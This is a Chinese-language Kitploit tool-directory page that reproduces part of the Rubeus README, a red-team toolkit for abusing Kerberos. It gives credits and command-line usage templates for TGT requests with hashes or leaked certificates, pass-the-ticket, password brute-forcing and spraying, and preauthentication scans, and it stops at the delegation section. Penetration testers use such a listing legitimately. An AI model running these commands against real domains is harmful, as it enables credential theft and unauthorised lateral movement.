Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Rubeus — 尝试驯服三头犬。 | Kitploit
工具/GitHubGitHub/ghostpack/rubeus
权限提升持久化机制漏洞分析漏洞利用横向移动后渗透利用渗透测试身份验证红队横向移动 分类第 3 名持久化机制 分类第 17 名
5.1k8988110个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
后渗透利用 分类第 5 名
红队 分类第 11 名
GitHubghostpack/rubeus

Rubeus

尝试驯服三头犬。

查看仓库

Rubeus


Rubeus是一个用于原始Kerberos交互和滥用的C#工具集。它大量改编自Benjamin Delpy的Kekeo项目(CC BY-NC-SA 4.0许可证)和Vincent LE TOUX的MakeMeEnterpriseAdmin项目(GPL v3.0许可证)。完全感谢Benjamin和Vincent解决了武器化中的困难组件——没有他们之前的工作,这个项目就不会存在。

Charlie Clark 和 Ceri Coburn 作为共同开发者对Rubeus代码库做出了重大贡献。Elad Shamir 贡献了基于资源的约束委派的关键工作。非常感谢他们的工作!

Rubeus还使用了来自Thomas Pornin的一个名为DDer的C# ASN.1解析/编码库,该库以类似MIT的许可证发布。非常感谢Thomas提供的干净稳定的代码!

PKINIT代码大量改编自@SteveSyfuhs的Bruce工具。Bruce使RFC4556 (PKINIT)变得更容易理解。非常感谢Steve!

Kerberos PAC的NDR编码和解码基于来自@tiraniddo的NtApiDotNet库,感谢James。

用于Kerberoasting的KerberosRequestorSecurityToken.GetRequest方法由@machosec贡献给PowerView(然后被整合到Rubeus中)。

@harmj0y是该代码库的主要作者。

Rubeus使用BSD 3-Clause许可证。

目录

  • Rubeus
    • 目录
    • 背景
      • 命令行使用
      • 操作安全注意事项
        • 概述
        • 武器化
        • 示例:凭据提取
        • 示例:过度传递哈希
    • 票据请求和续订
      • asktgt
      • asktgs
      • renew
      • brute|spray
    • 约束委派滥用
      • s4u
    • 票据伪造
      • golden
      • silver
      • diamond
    • 票据管理
      • ptt
      • purge
      • describe
    • 票据提取与收集
      • triage
      • klist
      • dump
      • tgtdeleg
      • monitor
      • harvest
    • Roasting
      • kerberoast
        • Kerberoasting操作安全注意事项
        • 示例
      • asreproast
    • 杂项
      • createnetonly
      • changepw
      • hash
      • tgssub
      • currentluid
      • logonsession
      • asrep2kirbi
      • kirbi
    • 编译说明
      • 针对其他.NET版本
      • 附注:将Rubeus构建为库
      • 附注:通过PowerShell运行Rubeus
        • 附注的附注:通过PSRemoting运行Rubeus

背景

命令行使用

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3


 票据请求和续订:

    基于用户密码/哈希检索TGT,可选择保存到文件或应用到当前登录会话或特定的LUID:
        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    基于用户密码/哈希检索TGT,可选择保存到文件或应用到当前登录会话或特定的LUID:
        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    基于用户密码/哈希检索TGT,启动/netonly进程,并将票据应用到新进程/登录会话:
        Rubeus.exe asktgt /user:USER </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/opsec] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    使用PCKS12证书检索TGT,启动/netonly进程,并将票据应用到新进程/登录会话:
        Rubeus.exe asktgt /user:USER /certificate:C:\temp\leaked.pfx </password:STOREPASSWORD> /createnetonly:C:\Windows\System32\cmd.exe [/getcredentials] [/servicekey:KRBTGTKEY] [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/nowrap] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    使用用户密钥库(智能卡)中的证书检索TGT,指定证书指纹或主题,启动/netonly进程,并将票据应用到新进程/登录会话:
        Rubeus.exe asktgt /user:USER /certificate:f063e6f4798af085946be6cd9d82ba3999c7ebac /createnetonly:C:\Windows\System32\cmd.exe [/show] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/suppenctype:DES|RC4|AES128|AES256] [/nowrap]

    检索适用于changepw命令更改密码过期的账户的TGT:
        Rubeus.exe asktgt /user:USER </password:PASSWORD /changepw [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/proxyurl:https://KDC_PROXY/kdcproxy]

    请求TGT而不发送预认证数据:
        Rubeus.exe asktgt /user:USER [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/nopac] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

    使用AS-REQ请求服务票据:
        Rubeus.exe asktgt /user:USER /service:SPN </password:PASSWORD [/enctype:DES|RC4|AES128|AES256] | /des:HASH | /rc4:HASH | /aes128:HASH | /aes256:HASH> [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/luid] [/nowrap] [/opsec] [/nopac] [/oldsam] [/proxyurl:https://KDC_PROXY/kdcproxy] [/suppenctype:DES|RC4|AES128|AES256]

   为一个或多个SPN检索服务票据,可选择保存或应用票据:
        Rubeus.exe asktgs </ticket:BASE64 | /ticket:FILE.KIRBI> </service:SPN1,SPN2,...> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

使用Kerberos Key List Request选项检索服务票据:
    	Rubeus.exe asktgs /keyList /service:KRBTGT_SPN </ticket:BASE64 | /ticket:FILE.KIRBI> [/enctype:DES|RC4|AES128|AES256] [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/nowrap] [/enterprise] [/opsec] </tgs:BASE64 | /tgs:FILE.KIRBI> [/targetdomain] [/u2u] [/targetuser] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

检索委托管理服务账户票据:
    	Rubeus.exe asktgs /dmsa /opsec /service:KRBTGT_SPN /targetuser:DMSA_ACCOUNT$ </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER_Win2025] [/outfile:FILENAME] [/ptt] [/nowrap] [/servicekey:PASSWORDHASH] [/asrepkey:ASREPKEY] [/proxyurl:https://KDC_PROXY/kdcproxy]

    续订TGT,可选择应用票据、保存或自动续订至其renew-till限制:
        Rubeus.exe renew </ticket:BASE64 | /ticket:FILE.KIRBI> [/dc:DOMAIN_CONTROLLER] [/outfile:FILENAME] [/ptt] [/autorenew] [/nowrap]

    执行基于Kerberos的密码暴力破解攻击:
        Rubeus.exe brute </password:PASSWORD | /passwords:PASSWORDS_FILE> [/user:USER | /users:USERS_FILE] [/domain:DOMAIN] [/creduser:DOMAIN\\USER & /credpassword:PASSWORD] [/ou:ORGANIZATION_UNIT] [/dc:DOMAIN_CONTROLLER] [/outfile:RESULT_PASSWORD_FILE] [/noticket] [/verbose] [/nowrap]

    扫描不需要预认证的账户:
        Rubeus.exe preauthscan /users:C:\temp\users.txt [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/proxyurl:https://KDC_PROXY/kdcproxy]


 约束委派滥用:
下载工具